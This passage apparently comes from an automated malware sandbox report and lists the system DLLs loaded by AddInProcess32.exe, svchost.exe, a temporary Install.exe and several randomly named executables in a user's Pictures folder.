                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: authz.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: devrtl.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: sensapi.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: peerdist.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeSection loaded: msimg32.dll
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeSection loaded: msvcr100.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: usosvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: updatepolicy.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: taskschd.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: upshared.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: usocoreps.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: usoapi.dll
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeSection loaded: acgenral.dll
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeSection loaded: winmm.dll
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeSection loaded: samcli.dll
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeSection loaded: msacm32.dll
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeSection loaded: dwmapi.dll
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeSection loaded: mpr.dll
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeSection loaded: winmmbase.dll
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeSection loaded: winmmbase.dll
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeSection loaded: netutils.dll
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeSection loaded: aclayers.dll
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeSection loaded: sfc.dll
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeSection loaded: sfc_os.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: wininet.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: gpedit.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: activeds.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: dssec.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: dsuiext.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: framedynos.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: dsrole.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: logoncli.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: mpr.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: netutils.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: ntdsapi.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: authz.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: adsldpc.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: adsldpc.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: webio.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: schannel.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: wldp.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: amsi.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: profapi.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: netutils.dll
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: acgenral.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: samcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: msacm32.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: dwmapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: winmmbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: winmmbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: aclayers.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: sfc.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: sfc_os.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: windows.storage.dll
